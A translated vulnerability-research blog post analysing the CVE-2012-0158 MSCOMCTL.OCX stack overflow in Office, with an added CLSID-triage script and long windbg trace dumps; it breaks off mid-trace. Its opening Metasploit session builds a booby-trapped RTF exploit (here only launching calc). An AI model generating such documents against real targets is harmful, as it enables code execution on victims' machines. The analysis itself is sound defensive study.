An Enduring Classic: Analysis, Exploitation, Detection and Summary of the CVE-2012-0158 Vulnerability
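Published: 2017-12-21 14:09:32
A while ago I debugged CVE-2017-11882, and during the analysis I noticed that CVE-2017-11882 and CVE-2012-0158 are very similar. Last weekend I decided to re-analyze 0158, this classic stack overflow. Because 0158 is the entry-level vulnerability in the Office field, I use it in this article to show the basic analysis process for this class of vulnerabilities in ActiveX controls embedded in Office documents.
Generating a sample with Metasploit
First, generate a CVE-2012-0158 sample that pops the calculator, using Metasploit on Kali Linux. The steps are as follows: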
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit(ms12_027_mscomctl_bof) > info
Name: MS12-027 MSCOMCTL ActiveX Buffer Overflow
Module: exploit/windows/fileformat/ms12_027_mscomctl_bof
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2012-04-10
Provided by:
Unknown
juan vazquez
sinn3r
Available targets:
Id Name
-- ----
0 Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English
1 Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
Payload information:
Space: 900
Avoid: 1 characters
Description:
This module exploits a stack buffer overflow in MSCOMCTL.OCX. It
uses a malicious RTF to embed the specially crafted
MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April
2012. This module targets Office 2007 and Office 2010 targets. The
DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain
proposed by Abysssec. This chain uses "msgr3en.dll", which will load
after office got load, so the malicious file must be loaded through
"File / Open" to achieve exploitation.
References:
https://cvedetails.com/cve/CVE-2012-0158/
OSVDB (81125)
http://www.securityfocus.com/bid/52911
https://technet.microsoft.com/en-us/library/security/MS12-027
http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html
msf exploit(ms12_027_mscomctl_bof) > set payload windows/exec
payload => windows/exec
msf exploit(ms12_027_mscomctl_bof) > show options
Module options (exploit/windows/fileformat/ms12_027_mscomctl_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
Payload options (windows/exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
Exploit target:
Id Name
-- ----
0 Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English
msf exploit(ms12_027_mscomctl_bof) > set CMD calc
CMD => calc
msf exploit(ms12_027_mscomctl_bof) > set target 0
target => 0
msf exploit(ms12_027_mscomctl_bof) > exploit
[*] Creating 'msf.doc' file ...
[+] msf.doc stored at /root/.msf4/local/msf.doc
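Rename the generated file to cve-2012-0158-msf-2007.rtf, drag it into a virtual machine with Office 2007 installed, and double-click to open it; the calculator pops up as expected. Now let's start debugging the vulnerability.
Static analysis
Figure 1 shows the generated sample RTF file opened in Notepad++ (slightly tidied up). The \objocx keyword indicates that an ActiveX control object is embedded, and the data following \objdata is the control data. The control is stored in the RTF document in OLE format; this data is read into the memory of the winword.exe process and parsed.
Figure 1
We use the rtfobj.py tool to extract the embedded OLE object; the result is shown in Figure 2:
Figure 2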
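Open the extracted OLE object with OleFileView; it contains three streams: Contents, ObjInfo and OCXNAME. Their contents are shown in Figures 3, 4 and 5 respectively.
Figure 3 (the Contents stream stores a fairly large amount of data; my guess is that this stream holds the control data)
Figure 4 (the ObjInfo stream stores only a few bytes)
Figure 5 (the OCXNAME stream stores the control name)
Next, drag the extracted object cve-2012-0158-msf-2007.rtf__object_000000A0.bin into 010 Editor, open it with the OLESS template, and locate the following CLSID: bdd1f04b-858b-11d1-b16a-00c0f0283628, as shown in Figure 6:
Figure 6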
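Now let's see which module this CLSID corresponds to (Figure 7). The module for the ListView control is MSCOMCTL.OCX. Usually, at this point you know on which module to set a load breakpoint during analysis. Of course, when facing a brand-new sample we still cannot determine at this stage how the vulnerability arises, but we can infer that it is related to the MSCOMCTL.OCX module. At the end of his blog post on 0158, 维一零 wrote: "The biggest hole in this article is that my analysis presupposes that I already knew the vulnerable module was the ActiveX control parsing library MSCOMCTL.DLL. If I had not known that, how would I have analyzed this vulnerability?" The answer to this question is: find the CLSID inside the OLE object, then look up the associated module. That gives you a starting point when facing a new vulnerability sample.
Figure 7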
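The CLSID lookup described above can be scripted for triage. The following is an added example, not code from the original article or from rtfobj.py: it decodes each \objdata blob in an RTF file, finds the embedded OLE compound file, reads the CLSID of its root directory entry and maps it to a module. The function names, the one-entry CLSID table and the constructed sample are assumptions for illustration; obfuscated RTF (control words nested inside the hex) is not handled.

```python
import re
import struct
import uuid

CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # OLE compound file signature

# CLSID -> hosting module. The single entry is the pair named in the article;
# on a real system the mapping comes from HKCR\CLSID\{...}\InprocServer32.
WATCHED_CLSIDS = {
    uuid.UUID("bdd1f04b-858b-11d1-b16a-00c0f0283628"): "MSCOMCTL.OCX (ListView)",
}


def extract_objdata(rtf):
    """Decode the hex payload of every \\objdata destination in an RTF string."""
    blobs = []
    for match in re.finditer(r"\\objdata(?![a-z])([^{}\\]*)", rtf):
        # RTF allows whitespace and line breaks between hex digits.
        digits = re.sub(r"[^0-9a-fA-F]", "", match.group(1))
        blobs.append(bytes.fromhex(digits[: len(digits) & ~1]))  # drop odd nibble
    return blobs


def root_clsid(blob):
    """Return the CLSID of the root storage of the first OLE file in blob, or None."""
    start = blob.find(CFB_MAGIC)
    if start < 0 or len(blob) - start < 512:
        return None
    cfb = blob[start:]
    (sector_shift,) = struct.unpack_from("<H", cfb, 0x1E)
    (first_dir_sector,) = struct.unpack_from("<I", cfb, 0x30)
    if sector_shift not in (9, 12):  # 512-byte or 4096-byte sectors only
        return None
    # Sector n starts at (n + 1) << shift; the root entry is the first
    # 128-byte directory entry and keeps its CLSID at offset 80.
    entry = (first_dir_sector + 1) << sector_shift
    if entry + 128 > len(cfb):
        return None
    return uuid.UUID(bytes_le=cfb[entry + 80 : entry + 96])


def triage(rtf):
    """List every embedded object with its size, root CLSID and known module."""
    findings = []
    for index, blob in enumerate(extract_objdata(rtf)):
        clsid = root_clsid(blob)
        findings.append({
            "index": index,
            "size": len(blob),
            "clsid": str(clsid) if clsid else None,
            "module": WATCHED_CLSIDS.get(clsid),
        })
    return findings


def constructed_sample():
    """Build a harmless, constructed RTF: a header-only OLE file, no control data."""
    header = bytearray(512)
    header[0:8] = CFB_MAGIC
    struct.pack_into("<H", header, 0x1E, 9)   # sector shift: 512-byte sectors
    struct.pack_into("<I", header, 0x30, 0)   # directory starts in sector 0
    root = bytearray(128)
    name = "Root Entry".encode("utf-16-le")
    root[0 : len(name)] = name
    struct.pack_into("<H", root, 0x40, len(name) + 2)
    root[0x42] = 5                            # object type: root storage
    root[80:96] = uuid.UUID("bdd1f04b-858b-11d1-b16a-00c0f0283628").bytes_le
    directory = bytes(root) + bytes(512 - 128)
    # 16 zero bytes stand in for the OLE 1.0 wrapper that precedes the file.
    payload = bytes(16) + bytes(header) + directory
    digits = payload.hex()
    wrapped = "\n".join(digits[i : i + 64] for i in range(0, len(digits), 64))
    return "{\\rtf1{\\object\\objocx{\\*\\objdata " + wrapped + "}}}"


if __name__ == "__main__":
    for finding in triage(constructed_sample()):
        print(finding)
```

A non-empty "module" field tells you which module to set the load breakpoint on before opening the document in the debugger.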
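Dynamic analysis
From the analysis above we know this sample pops the calculator. Attach windbg to the Word process and set the following two breakpoints (Figure 8). After the break, the stack backtrace looks like Figure 9; the stack is badly corrupted. The preliminary judgment is that this is a stack overflow vulnerability.
Figure 8
Figure 9
However, we cannot pinpoint which module is at fault, and walking the stack backward and forward and inspecting the registers (Figure 10) gives no further useful information:
Figure 10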
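At this point we could install EMET and, after opening the sample, use EMET's records: locating the addresses in the DEP, EAF, ROP and related entries in Event Viewer narrows down the trigger point of the vulnerability (such as a jmp esp). Here I decided to take a different approach. Since the sample has to load an OLE object, a call to the OpenStream function is unavoidable, so I searched for OpenStream-related functions in windbg; the result is shown in Figure 11:
Figure 11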
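The function ole32!CExposedDocFile::OpenStream caught my attention. Microsoft's definition of the OpenStream function is shown in Figure 12. We are interested in its first parameter, which Microsoft explains as shown in Figure 13: clearly, this parameter is a Unicode string holding the name of the stream. Because the this pointer is also passed, the actual implementation of this function inside ole32 looks like Figure 14, and the stream name is the second parameter.
Figure 12
Figure 13
Figure 14
Now set the following breakpoint in the debugger (Figure 15):
Figure 15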
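We can see that the calculator pops up after the "Contents" stream is opened, while the other two streams seen in the static analysis produce no output. At this point we can tentatively conclude that the stack overflow is located in the Contents stream; the working hypothesis is that the MSCOMCTL.OCX module goes wrong while parsing the Contents stream of the embedded control.
Set a module-load breakpoint on the MSCOMCTL.OCX module, sxe ld:mscomctl, to avoid breaking in OpenStream when other unrelated stream objects in the document are opened. Restart windbg; when the module-load breakpoint is hit, look at the module information for this debugging session (Figure 16):
Figure 16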
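Next, break when ole32!CExposedDocFile::OpenStream opens the "Contents" stream. While debugging dynamically in windbg, color the code block at each jump point in IDA, and keep pressing F10 to step over functions until the calculator pops up. Then restart windbg, set a breakpoint at the last location reached, press F11 to step into that function, and repeat the process. In this way, after a few hours, I obtained the complete execution flow that triggers the vulnerability (the initial record was fairly rough; the figure below is the result after I gradually added the corresponding symbols and refined it), shown in Figure 17. Blue marks the stack backtrace; orange marks each location where CExposedStream::Read is called (this function is discussed later); purple marks the final stack overflow point.
A note on symbols: 维一零's blog post analyzing 0158 ends with an attachment that includes an MSCOMCTL module with a symbol table. Interested readers can download his attachment.
Figure 17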
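During debugging I found that winword calls the CExposedStream::Read function every time it reads from a stream. The declaration of this function is shown in Figure 18:
Figure 18
The second parameter is a pointer to the buffer that receives the data, the third parameter is the number of bytes to read, and the last parameter is a pointer to an int that returns the number of bytes actually read.
Restart windbg and, after the MSCOMCTL.OCX module is loaded, set the following breakpoint on CExposedStream::Read with the corresponding output. The result is as follows (some symbol-loading log lines omitted):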
0:000> bp ole32!CExposedStream::Read ".echo --------------------------------------------------------------------------------------------------------------; r $t0=poi(esp+8); r $t1=poi(esp+c); k; gu; db $t0 l$t1; .printf \"ReadLength = 0x%x\\n\", $t1; g;"
0:000> g
--------------------------------------------------------------------------------------------------------------
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MSCOMCTL.OCX -
ChildEBP RetAddr
0030a9e4 2758af07 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030aa14 2758aeda MSCOMCTL!DllGetClassObject+0x41c3
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x4196
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0031a918 65878372 wwlib!DllCanUnloadNow+0x547005
0030aa0c 21 43 34 12 08 00 00 00 !C4.....
ReadLength = 0x8
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a9e4 2758af30 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030aa14 2758aeda MSCOMCTL!DllGetClassObject+0x41ec
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x4196
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0031a918 65878372 wwlib!DllCanUnloadNow+0x547005
0030aa04 6a b0 82 2c bb 05 00 00 j..,....
ReadLength = 0x8
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a988 275b673b ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2f9f7
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0031a918 65878372 wwlib!DllCanUnloadNow+0x547005
0030a9f0 4e 08 7d eb 01 00 06 00-1c 00 00 00 00 00 00 00 N.}.............
0030aa00 00 00 00 00 00 06 00 01-56 0a 00 00 ........V...
ReadLength = 0x1c
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a988 275b679c ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fa58
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0031a918 65878372 wwlib!DllCanUnloadNow+0x547005
0030a9ac 01 ef cd ab 00 00 05 00-98 5d 65 01 07 00 00 00 .........]e.....
0030a9bc 08 00 00 80 05 00 00 80-00 00 00 00 ............
ReadLength = 0x1c
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a96c 275b6875 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a994 275b67c6 MSCOMCTL!DllGetClassObject+0x2fb31
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fa82
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0030a99c 00 00 00 00 ....
ReadLength = 0x4
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a96c 275b6875 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a994 275b67d9 MSCOMCTL!DllGetClassObject+0x2fb31
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fa95
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0030a99c 00 00 00 00 ....
ReadLength = 0x4
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a96c 275b6875 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a994 275b67ec MSCOMCTL!DllGetClassObject+0x2fb31
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2faa8
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0030a99c 00 00 00 00 ....
ReadLength = 0x4
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a95c 2758b02f ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a994 275b67fb MSCOMCTL!DllGetClassObject+0x42eb
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fab7
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0030a980 1f de ec bd 01 00 05 00-90 17 19 00 ............
ReadLength = 0xc
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a96c 275b68e5 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a990 275b6813 MSCOMCTL!DllGetClassObject+0x2fba1
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2facf
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145
0030a98c 00 00 ..
ReadLength = 0x2
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a944 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a96c 275e72d8 MSCOMCTL!DllGetClassObject+0x41a42
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xfc6
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
0030a968 08 00 00 00 ....
ReadLength = 0x4
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a944 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a96c 275e72d8 MSCOMCTL!DllGetClassObject+0x41a74
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xfc6
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
05e0efb8 49 74 6d 73 64 00 00 00 Itmsd...
ReadLength = 0x8
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a944 275c87ed ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a96c 275e72d8 MSCOMCTL!DllGetClassObject+0x41aa9
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xfc6
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
ReadLength = 0x0
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a944 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a96c 275e7306 MSCOMCTL!DllGetClassObject+0x41a42
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xff4
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
